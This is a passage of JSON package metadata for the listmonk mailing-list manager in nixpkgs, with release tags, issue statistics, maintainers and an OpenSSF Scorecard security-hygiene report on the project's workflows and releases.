@v0.9.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.9.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.9.0-beta/manifests"},{"name":"v0.8.0-beta","sha":"cde0b4b42a3e0e18b7e08d701e5ca4482cd6fe73","kind":"commit","published_at":"2020-11-10T16:51:25.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.8.0-beta","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.8.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.8.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.8.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.8.0-beta/manifests"},{"name":"v0.7.0-alpha","sha":"0f055eacb87030b55970f4870ff3a0b22b0dcaef","kind":"commit","published_at":"2020-08-09T14:32:43.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.7.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.7.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.7.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.7.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.7.0-alpha/manifests"},{"name":"v0.6.2-alpha","sha":"82702ed5bc64c4cbc567b561f187bc3f8abe83b5","kind":"commit","published_at":"2020-05-25T06:25:02.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.2-alpha/manifests"},{"name":"v0.6.1-alpha","sha":"18329ff052e62e74b9114d4e2126074c9845277b","kind":"commit","published_at":"2020-05-17T15:37:48.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.1-alpha/manifests"},{"name":"v0.6.0-alpha","sha":"cb331b93418eecaffdfcdcc38c91606328afdf47","kind":"commit","published_at":"2020-05-16T18:09:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.0-alpha/manifests"},{"name":"v0.5.2-alpha","sha":"b8d9ab10f29d8fc3c3dc0fcfb235ce453d8c58bf","kind":"commit","published_at":"2020-04-02T12:52:56.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.2-alpha/manifests"},{"name":"v0.5.1-alpha","sha":"21ffe5fb02256a6e391b5e2ebe11554badee5ee5","kind":"commit","published_at":"2020-04-01T14:29:41.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.1-alpha/manifests"},{"name":"v0.5.0-alpha","sha":"ad9ee7528d34ce19659a7aa963ada18baebddb0b","kind":"commit","published_at":"2020-03-08T10:40:34.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.0-alpha/manifests"},{"name":"v0.4.0-alpha","sha":"62aa31b14cf651084a76aba0021106fd78911081","kind":"commit","published_at":"2020-02-09T13:45:14.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.4.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.4.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.4.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.4.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.4.0-alpha/manifests"},{"name":"v0.3.3-alpha","sha":"9a88c2ed7b69bf020ccc95625788017f214a29c3","kind":"commit","published_at":"2020-02-06T10:09:43.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.3-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.3-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.3-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.3-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.3-alpha/manifests"},{"name":"v0.3.2-alpha","sha":"047de697707e4a3ea23b53c7a1917f20edc9f8c2","kind":"commit","published_at":"2020-02-05T12:39:13.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.2-alpha/manifests"},{"name":"v0.3.1-alpha","sha":"1064f1e4d8b1ef8d083f02254900b42c442e6e92","kind":"commit","published_at":"2020-01-19T15:19:01.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.1-alpha/manifests"},{"name":"v0.3.0-alpha","sha":"ccd354df3f85259a0b88dffe4a51586aab01135b","kind":"commit","published_at":"2019-10-31T06:31:13.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.0-alpha/manifests"},{"name":"v0.2.2-alpha","sha":"d8d7f88af357823778f468ee50deef0b49f0cd77","kind":"commit","published_at":"2019-09-10T07:26:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.2-alpha/manifests"},{"name":"v0.2.1-alpha","sha":"649d1b11f0d4d0c353f9682656514056d4e7d769","kind":"tag","published_at":"2019-08-26T18:16:32.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.1-alpha/manifests"},{"name":"v0.2.0-alpha","sha":"b63b31ec52f52e48b6b456134857c737340f29f6","kind":"commit","published_at":"2019-07-21T16:42:54.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.0-alpha/manifests"},{"name":"v0.1.2-alpha","sha":"275554e57e31d5bf4505e06101e1c69ef91293ed","kind":"commit","published_at":"2019-07-12T11:49:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.2-alpha/manifests"},{"name":"v0.1.1-alpha","sha":"3d3af8c429bd4f0d4936115e9becd45d3a6b77c0","kind":"commit","published_at":"2019-07-12T10:18:29.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.1-alpha/manifests"},{"name":"v0.1.0-alpha","sha":"9fd9748d4d02f708d311ddf7d6d3b308b575e24b","kind":"commit","published_at":"2019-07-09T11:36:23.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.0-alpha/manifests"}]},"repo_metadata_updated_at":"2026-08-18T02:47:53.660Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/listmonk?channel=unstable","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/listmonk","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/listmonk","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/listmonk/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-11T05:00:15.084Z","issues_count":923,"pull_requests_count":424,"avg_time_to_close_issue":6063203.975,"avg_time_to_close_pull_request":1067791.0233918128,"issues_closed_count":640,"pull_requests_closed_count":342,"pull_request_authors_count":188,"issue_authors_count":621,"avg_comments_per_issue":2.734561213434453,"avg_comments_per_pull_request":1.0919811320754718,"merged_pull_requests_count":240,"bot_issues_count":0,"bot_pull_requests_count":66,"past_year_issues_count":95,"past_year_pull_requests_count":67,"past_year_avg_time_to_close_issue":3185527.6666666665,"past_year_avg_time_to_close_pull_request":636134.3191489362,"past_year_issues_closed_count":33,"past_year_pull_requests_closed_count":47,"past_year_pull_request_authors_count":44,"past_year_issue_authors_count":81,"past_year_avg_comments_per_issue":1.4105263157894736,"past_year_avg_comments_per_pull_request":1.462686567164179,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":15,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/issues","maintainers":[{"login":"knadh","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knadh"},{"login":"mr-karan","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mr-karan"},{"login":"rhnvrm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rhnvrm"}],"active_maintainers":[{"login":"knadh","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knadh"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/listmonk/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/listmonk/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/listmonk/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/listmonk/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/listmonk/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/listmonk/codemeta","maintainers":[{"uuid":"RaitoBezarius","login":null,"name":"Ryan Lahfa","email":"ryan@lahfa.xyz","url":"https://github.com/RaitoBezarius","packages_count":88,"html_url":null,"role":null,"created_at":"2026-03-02T16:24:31.881Z","updated_at":"2026-03-02T16:24:31.881Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers/RaitoBezarius/packages"},{"uuid":"hrenard","login":null,"name":"Hugo Renard","email":"hugo.renard@proton.me","url":"https://github.com/hrenard","packages_count":5,"html_url":null,"role":null,"created_at":"2026-03-02T16:24:31.939Z","updated_at":"2026-03-02T16:24:31.939Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers/hrenard/packages"}],"registry":{"name":"nixpkgs-unstable","url":"https://channels.nixos.org/nixos-unstable","ecosystem":"nixpkgs","default":true,"packages_count":154149,"maintainers_count":4919,"namespaces_count":0,"keywords_count":3244,"github":"NixOS","metadata":{"funded_packages_count":6418},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:52.762Z","updated_at":"2026-09-01T05:03:32.585Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/namespaces"}},{"id":12792183,"name":"listmonk","ecosystem":"nixpkgs","description":"High performance, self-hosted, newsletter and mailing list manager with a modern dashboard.","homepage":"https://github.com/knadh/listmonk","licenses":"AGPL-3.0","normalized_licenses":["AGPL-3.0"],"repository_url":"https://github.com/knadh/listmonk","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-01-26T12:55:27.456Z","latest_release_published_at":"2026-01-26T12:55:27.456Z","latest_release_number":"2.2.0","last_synced_at":"2026-07-26T04:01:37.993Z","created_at":"2026-01-26T12:55:27.300Z","updated_at":"2026-08-18T03:14:30.602Z","registry_url":"https://search.nixos.org/packages?channel=23.05\u0026query=listmonk","install_command":"nix-env -iA nixpkgs.listmonk","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.05/pkgs/servers/mail/listmonk/default.nix#L50","metadata":{"nix_attribute":"listmonk-2.2.0","position":"pkgs/servers/mail/listmonk/default.nix:50","platforms":["x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mipsel-linux","mips64el-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"]},"repo_metadata":{"id":37385001,"uuid":"193833307","full_name":"knadh/listmonk","owner":"knadh","description":"High performance, self-hosted, newsletter and mailing list manager with a modern dashboard. Single binary app.","archived":false,"fork":false,"pushed_at":"2026-08-17T17:59:57.000Z","size":51687,"stargazers_count":22959,"open_issues_count":105,"forks_count":2530,"subscribers_count":140,"default_branch":"master","last_synced_at":"2026-08-18T02:44:25.356Z","etag":null,"topics":["campaign","campaign-management","email-marketing","email-subscription","listmonk","mailing-list","newsletter","newsletter-management","newsletter-software","self-hosted","sms-gateway","smtp","transactional-emails"],"latest_commit_sha":null,"homepage":"https://listmonk.app","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/knadh.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2019-06-26T05:08:39.000Z","updated_at":"2026-08-18T02:21:35.000Z","dependencies_parsed_at":"2022-07-12T16:17:41.274Z","dependency_job_id":"71e3fe47-ce35-4f28-872a-148e180d6c82","html_url":"https://github.com/knadh/listmonk","commit_stats":null,"previous_names":[],"tags_count":42,"template":false,"template_full_name":null,"purl":"pkg:github/knadh/listmonk","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/sbom","scorecard":{"id":161421,"data":{"date":"2025-08-11","repo":{"name":"github.com/knadh/listmonk","commit":"38387d007926c2fbc3e0daaf15970dd3f5581f43"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.3,"checks":[{"name":"Code-Review","score":4,"reason":"Found 13/27 approved changesets -- score normalized to 4","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 6 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/build-sanity.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/github-pages.yml:12","Warn: no topLevel permission defined: .github/workflows/issues.yml:1","Warn: topLevel permissions set to 'write-all': .github/workflows/release.yml:8"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: GNU Affero General Public License v3.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/release.yml:11"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build-sanity.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/build-sanity.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build-sanity.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/build-sanity.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/github-pages.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/github-pages.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:48: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/issues.yml:11: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/issues.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:49: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: containerImage not pinned by hash: Dockerfile:1: pin your Docker image by updating alpine:latest to alpine:latest@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","Warn: containerImage not pinned by hash: dev/app.Dockerfile:1","Warn: containerImage not pinned by hash: dev/app.Dockerfile:3","Warn: pipCommand not pinned by hash: .github/workflows/github-pages.yml:27","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   7 third-party GitHubAction dependencies pinned","Info:   0 out of   3 containerImage dependencies pinned","Info:   0 out of   1 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v5.0.3 not signed: https://api.github.com/repos/knadh/listmonk/releases/230297465","Warn: release artifact v5.0.2 not signed: https://api.github.com/repos/knadh/listmonk/releases/223848166","Warn: release artifact v5.0.1 not signed: https://api.github.com/repos/knadh/listmonk/releases/220844848","Warn: release artifact v5.0.0 not signed: https://api.github.com/repos/knadh/listmonk/releases/215270409","Warn: release artifact v4.1.0 not signed: https://api.github.com/repos/knadh/listmonk/releases/184955432","Warn: release artifact v5.0.3 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/230297465","Warn: release artifact v5.0.2 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/223848166","Warn: release artifact v5.0.1 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/220844848","Warn: release artifact v5.0.0 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/215270409","Warn: release artifact v4.1.0 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/184955432"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"SAST","score":2,"reason":"SAST tool is not run on all commits -- score normalized to 2","details":["Warn: 4 commits out of 16 are checked with a SAST 